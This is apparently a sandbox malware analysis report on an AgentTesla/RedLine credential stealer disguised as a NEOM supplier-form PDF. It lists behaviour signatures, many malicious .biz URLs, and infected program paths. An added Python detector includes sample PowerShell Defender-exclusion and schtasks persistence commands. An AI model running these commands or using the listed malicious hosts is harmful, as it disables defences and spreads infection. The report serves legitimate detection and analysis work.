Windows Analysis Report
NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE

Overview

General Information

Sample name: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Analysis ID: 1505544
MD5: b3f46ad365e186080ca18bcec6437be9
SHA1: 3c0b8f485cce7ab2a439f72f12a8eb15e5a9a1b8
SHA256: 42d6efd448aaa7f28f8801a8dc83d91d30b5a7a1c3b9566f82e1348b1c98f1cc

Detection

AgentTesla, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected RedLine Stealer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match
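Several of the signature hits above are Sigma process-creation rules (Suspicious Double Extension File Execution, Powershell Base64 Encoded MpPreference Cmdlet, Powershell Defender Exclusion, Suspicious Schtasks From Env Var Folder, Suspicious Add Scheduled Task Parent). The following is an added example, not part of the Joe Sandbox report or of the Sigma rule set: it re-implements a simplified form of those rules over process-creation events. The ProcEvent type, detect() and the rule-name strings are this example's own; the events are constructed to illustrate the patterns and are not the command lines this sample actually ran. The one detail worth internalising is that PowerShell's -EncodedCommand carries the script as base64 of UTF-16LE text, so a detector must decode it before looking for Add-MpPreference.

```python
"""Simplified re-implementation of five Sigma-style process-creation rules.
Added example: events are constructed, not this sample's real command lines."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the started process
    parent_image: str   # full path of its parent
    command_line: str


# A document-like extension directly followed by an executable one, at the end of the path
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt|zip)\.(exe|scr|com|pif|bat|cmd)$", re.I)
MPPREF = re.compile(r"\b(Add|Set|Remove)-MpPreference\b", re.I)
EXCLUSION = re.compile(r"-Exclusion(Path|Process|Extension|IpAddress)\b", re.I)
ENV_FOLDER = re.compile(r"%(appdata|localappdata|temp|tmp|public|userprofile)%|\\AppData\\|\\Users\\Public\\", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line):
    """PowerShell -EncodedCommand carries the script as base64 of UTF-16LE text.
    Return (script, True) when such an argument decodes, else (command_line, False)."""
    m = ENCODED_ARG.search(command_line)
    if m:
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le"), True
        except ValueError:      # not base64 / odd byte count: inspect the raw line instead
            pass
    return command_line, False


def detect(ev):
    """Return the sorted rule names the event triggers ([] when none)."""
    hits = set()
    image = ev.image.lower()
    if DOUBLE_EXT.search(image):
        hits.add("suspicious_double_extension_file_execution")
    if image.endswith(("powershell.exe", "pwsh.exe")):
        script, encoded = decode_encoded_command(ev.command_line)
        if MPPREF.search(script) and EXCLUSION.search(script):
            hits.add("powershell_defender_exclusion")
            if encoded:
                hits.add("powershell_base64_encoded_mppreference_cmdlet")
    if image.endswith("schtasks.exe") and re.search(r"/create\b", ev.command_line, re.I):
        if ENV_FOLDER.search(ev.command_line):
            hits.add("suspicious_schtasks_from_env_var_folder")
        if ENV_FOLDER.search(ev.parent_image):
            hits.add("suspicious_add_scheduled_task_parent")
    return sorted(hits)


# Constructed events. The PowerShell payload is encoded here so the base64 is valid UTF-16LE.
EXCLUSION_SCRIPT = r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"
ENCODED_PAYLOAD = base64.b64encode(EXCLUSION_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE",
              r"C:\Windows\explorer.exe",
              r'"C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\user\AppData\Local\Temp\build.exe",
              f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_PAYLOAD}"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r"C:\Users\user\AppData\Local\Temp\build.exe",
              r'schtasks.exe /create /f /sc minute /mo 1 /tn "Updater" /tr "%APPDATA%\Updater\build.exe"'),
    ProcEvent(r"C:\Program Files\7-Zip\7zFM.exe", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\7-Zip\7zFM.exe"'),
]


def scan(events=SAMPLE_EVENTS):
    """Map each event's image path to the rules it triggers."""
    return {ev.image: detect(ev) for ev in events}


if __name__ == "__main__":
    for image, rules in scan().items():
        print(f"{image}\n    -> {', '.join(rules) or 'clean'}")
```

The real Sigma rules carry longer extension lists and more parent-path and task-path conditions than the regexes here; the shape of the logic (decode first, then match; pair the cmdlet with an -Exclusion* parameter so plain Get-MpPreference does not fire) is what carries over.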

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: http://pywolwnvd.biz/ibmog Avira URL Cloud: Label: malware
Source: http://ssbzmoy.biz/gadlqtcclo Avira URL Cloud: Label: malware
Source: http://przvgke.biz/ocfuav Avira URL Cloud: Label: malware
Source: http://npukfztj.biz/avqaqcipoasdlbgl Avira URL Cloud: Label: malware
Source: http://cvgrf.biz/rioeg Avira URL Cloud: Label: malware
Source: http://knjghuig.biz/qvtcyxjgqcewj Avira URL Cloud: Label: malware
Source: http://ssbzmoy.biz/qlyvjmdwxl Avira URL Cloud: Label: malware
Source: http://npukfztj.biz/hshnlfiqt Avira URL Cloud: Label: malware
Source: http://pywolwnvd.biz/dafjrbte Avira URL Cloud: Label: malware
Source: http://lpuegx.biz/qjnvredjkanikntw Avira URL Cloud: Label: phishing
Source: http://przvgke.biz/hea Avira URL Cloud: Label: malware
Source: http://lpuegx.biz/wqlih Avira URL Cloud: Label: phishing
Source: http://mnjmhp.biz/mtnqoxhnqxwi Avira URL Cloud: Label: malware
Source: http://dlynankz.biz/oyataqebqvq Avira URL Cloud: Label: malware
Source: http://typgfhb.biz/rqdnnkaqeymsqe Avira URL Cloud: Label: malware
Source: http://vyome.biz/bpkaqfdvy Avira URL Cloud: Label: malware
Source: http://qaynky.biz/soubumgu Avira URL Cloud: Label: malware
Source: http://vrrazpdh.biz/jjv Avira URL Cloud: Label: malware
Source: http://nqwjmb.biz/aawflokdkaaso Avira URL Cloud: Label: malware
Source: http://oshhkdluh.biz/b Avira URL Cloud: Label: malware
Source: http://yunalwv.biz/ieibbbqqgmrvhkh Avira URL Cloud: Label: malware
Source: http://fwiwk.biz/ful Avira URL Cloud: Label: malware
Source: http://gnqgo.biz/orioms Avira URL Cloud: Label: malware
Source: http://dwrqljrr.biz/pgm Avira URL Cloud: Label: malware
Source: http://tbjrpv.biz/iou Avira URL Cloud: Label: malware
Source: http://ftxlah.biz/jxjcyhijmgghr Avira URL Cloud: Label: malware
Source: http://brsua.biz/d Avira URL Cloud: Label: malware
Source: http://ytctnunms.biz/hysug Avira URL Cloud: Label: malware
Source: http://fwiwk.biz/l Avira URL Cloud: Label: malware
Source: http://iuzpxe.biz/kybt Avira URL Cloud: Label: malware
Source: http://deoci.biz/kyvgodg Avira URL Cloud: Label: malware
Source: http://jpskm.biz/gjwgeffxixqbuh Avira URL Cloud: Label: malware
Source: http://yauexmxk.biz/afqnwtrkmt Avira URL Cloud: Label: malware
Source: http://jhvzpcfg.biz/dx Avira URL Cloud: Label: malware
Source: http://xlfhhhm.biz/hdnypmld Avira URL Cloud: Label: malware
Source: http://vcddkls.biz/iac Avira URL Cloud: Label: malware
Source: http://ifsaia.biz/cygphrvvuwwhpqjy Avira URL Cloud: Label: malware
Source: http://qpnczch.biz/rlifsams Avira URL Cloud: Label: malware
Source: http://wllvnzb.biz/xurinfdw Avira URL Cloud: Label: malware
Source: http://acwjcqqv.biz/sucofgimje Avira URL Cloud: Label: malware
Source: http://gvijgjwkh.biz/lqycgpuam Avira URL Cloud: Label: malware
Source: http://oflybfv.biz/umdr Avira URL Cloud: Label: malware
Source: http://saytjshyf.biz/pjojuiupwn Avira URL Cloud: Label: malware
Source: http://esuzf.biz/adwycgrxdylfxl Avira URL Cloud: Label: malware
Source: http://yhqqc.biz/uilsnghvu Avira URL Cloud: Label: malware
Source: http://bumxkqgxu.biz/e Avira URL Cloud: Label: malware
Source: http://sxmiywsfv.biz/vahgcdxtf Avira URL Cloud: Label: malware
Source: http://lrxdmhrr.biz/yccyodm Avira URL Cloud: Label: malware
Source: http://yunalwv.biz/gx Avira URL Cloud: Label: malware
Source: http://pwlqfu.biz/wfktgrobq Avira URL Cloud: Label: malware
Source: http://zrlssa.biz/jmsidvkpax Avira URL Cloud: Label: malware
Source: http://ecxbwt.biz/mbcjcfmxxflkpmuo Avira URL Cloud: Label: malware
Source: http://cikivjto.biz/fnji Avira URL Cloud: Label: malware
Source: http://htwqzczce.biz/u Avira URL Cloud: Label: malware
Source: http://pectx.biz/vdswmyn Avira URL Cloud: Label: malware
Source: http://gcedd.biz/mtvhnvlftyscrey Avira URL Cloud: Label: phishing
Source: http://jlqltsjvh.biz/umjblkbuugg Avira URL Cloud: Label: malware
Source: http://rynmcq.biz/lrpwhcqxkh Avira URL Cloud: Label: malware
Source: http://warkcdu.biz/qgyptpaacdeujk Avira URL Cloud: Label: malware
Source: http://xyrgy.biz/huutba Avira URL Cloud: Label: malware
Source: http://jdhhbs.biz/bduojpmqwclgr Avira URL Cloud: Label: malware
Source: http://ecxbwt.biz/ocoeycxqebnmcofx Avira URL Cloud: Label: malware
Source: http://jwkoeoqns.biz/saunpuqsumkr Avira URL Cloud: Label: malware
Source: http://ywffr.biz/nkpyoqcnfxfvdsvg Avira URL Cloud: Label: malware
Source: http://reczwga.biz/w Avira URL Cloud: Label: malware
Source: http://fjumtfnz.biz/rvqem Avira URL Cloud: Label: malware
Source: http://ctdtgwag.biz/qmsckions Avira URL Cloud: Label: malware
Source: http://tnevuluw.biz/jpral Avira URL Cloud: Label: malware
Source: http://ocsvqjg.biz/cceha Avira URL Cloud: Label: malware
Source: http://eufxebus.biz/li Avira URL Cloud: Label: malware
Source: http://rffxu.biz/ociacchi Avira URL Cloud: Label: malware
Source: http://opowhhece.biz/ksosgyughs Avira URL Cloud: Label: malware
Source: http://wxgzshna.biz/qjjv Avira URL Cloud: Label: phishing
Source: http://kvbjaur.biz/w Avira URL Cloud: Label: malware
Source: http://uaafd.biz/cdficgkndhspr Avira URL Cloud: Label: malware
Source: http://damcprvgv.biz/ckgw Avira URL Cloud: Label: malware
Source: http://rffxu.biz/nifaqe Avira URL Cloud: Label: malware
Source: http://mgmsclkyu.biz/b Avira URL Cloud: Label: malware
Source: http://whjovd.biz/vu Avira URL Cloud: Label: malware
Source: http://bghjpy.biz/tqtlouxtvhvc Avira URL Cloud: Label: malware
Source: http://wxgzshna.biz/tp Avira URL Cloud: Label: phishing
Source: http://banwyw.biz/cfhujvjhaho Avira URL Cloud: Label: malware
Source: http://gjogvvpsf.biz/eyi Avira URL Cloud: Label: malware
Source: http://rrqafepng.biz/chtmfsmomhgtgs Avira URL Cloud: Label: malware
Source: http://htwqzczce.biz/njmokryu Avira URL Cloud: Label: malware
Source: http://hlzfuyy.biz/rngnlo Avira URL Cloud: Label: malware
Source: http://uphca.biz/ucx Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7z.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zG.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Windows\System32\AppVClient.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\build.exe Avira: detection malicious, Label: TR/AD.RedLineSteal.dzdht
Source: C:\Windows\System32\alg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zFM.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7z.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zG.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\7-Zip\7zFM.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: pywolwnvd.biz Virustotal: Detection: 12% Perma Link
Source: npukfztj.biz Virustotal: Detection: 10% Perma Link
Source: ssbzmoy.biz Virustotal: Detection: 11% Perma Link
Source: lpuegx.biz Virustotal: Detection: 11% Perma Link
Source: cvgrf.biz Virustotal: Detection: 10% Perma Link
Source: zlenh.biz Virustotal: Detection: 10% Perma Link
Source: przvgke.biz Virustotal: Detection: 10% Perma Link
Source: knjghuig.biz Virustotal: Detection: 12% Perma Link
Source: anpmnmxo.biz Virustotal: Detection: 10% Perma Link
Source: http://ssbzmoy.biz/gadlqtcclo Virustotal: Detection: 15% Perma Link
Source: uhxqin.biz Virustotal: Detection: 10% Perma Link
Source: http://pywolwnvd.biz/ibmog Virustotal: Detection: 14% Perma Link
Source: http://przvgke.biz/ocfuav Virustotal: Detection: 9% Perma Link
Source: http://knjghuig.biz/qvtcyxjgqcewj Virustotal: Detection: 11% Perma Link
Source: http://cvgrf.biz/rioeg Virustotal: Detection: 12% Perma Link
Source: http://npukfztj.biz/avqaqcipoasdlbgl Virustotal: Detection: 14% Perma Link
Source: http://pywolwnvd.biz/dafjrbte Virustotal: Detection: 14% Perma Link
Source: http://przvgke.biz/hea Virustotal: Detection: 9% Perma Link
Source: http://npukfztj.biz/hshnlfiqt Virustotal: Detection: 13% Perma Link
Source: http://ssbzmoy.biz/qlyvjmdwxl Virustotal: Detection: 16% Perma Link
Source: http://vyome.biz/bpkaqfdvy Virustotal: Detection: 13% Perma Link
Source: http://qaynky.biz/soubumgu Virustotal: Detection: 8% Perma Link
Source: http://nqwjmb.biz/aawflokdkaaso Virustotal: Detection: 12% Perma Link
Source: http://myups.biz/sem Virustotal: Detection: 14% Perma Link
Source: http://oshhkdluh.biz/b Virustotal: Detection: 13% Perma Link
Source: http://vrrazpdh.biz/jjv Virustotal: Detection: 11% Perma Link
Source: http://fwiwk.biz/ful Virustotal: Detection: 13% Perma Link
Source: http://yunalwv.biz/ieibbbqqgmrvhkh Virustotal: Detection: 9% Perma Link
Source: http://gytujflc.biz/jtccktxedeenfqg Virustotal: Detection: 9% Perma Link
Source: http://myups.biz/vsftv Virustotal: Detection: 9% Perma Link
Source: http://gnqgo.biz/orioms Virustotal: Detection: 11% Perma Link
Source: http://dwrqljrr.biz/pgm Virustotal: Detection: 12% Perma Link
Source: http://tbjrpv.biz/iou Virustotal: Detection: 10% Perma Link
Source: http://brsua.biz/d Virustotal: Detection: 10% Perma Link
Source: http://fwiwk.biz/l Virustotal: Detection: 14% Perma Link
Source: http://yauexmxk.biz/afqnwtrkmt Virustotal: Detection: 13% Perma Link
Source: http://jhvzpcfg.biz/dx Virustotal: Detection: 8% Perma Link
Source: http://qpnczch.biz/rlifsams Virustotal: Detection: 14% Perma Link
Source: http://gvijgjwkh.biz/lqycgpuam Virustotal: Detection: 12% Perma Link
Source: http://esuzf.biz/adwycgrxdylfxl Virustotal: Detection: 10% Perma Link
Source: http://acwjcqqv.biz/sucofgimje Virustotal: Detection: 12% Perma Link
Source: http://ifsaia.biz/cygphrvvuwwhpqjy Virustotal: Detection: 10% Perma Link
Source: http://vcddkls.biz/iac Virustotal: Detection: 8% Perma Link
Source: http://saytjshyf.biz/pjojuiupwn Virustotal: Detection: 11% Perma Link
Source: http://sxmiywsfv.biz/vahgcdxtf Virustotal: Detection: 12% Perma Link
Source: http://lrxdmhrr.biz/yccyodm Virustotal: Detection: 14% Perma Link
Source: http://yunalwv.biz/gx Virustotal: Detection: 13% Perma Link
Source: http://htwqzczce.biz/u Virustotal: Detection: 13% Perma Link
Source: http://pectx.biz/vdswmyn Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\Temp\build.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\build.exe Virustotal: Detection: 89% Perma Link
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Virustotal: Detection: 73% Perma Link
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Virustotal: Detection: 71% Perma Link
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7z.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zG.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\build.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zFM.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7z.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zG.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Joe Sandbox ML: detected
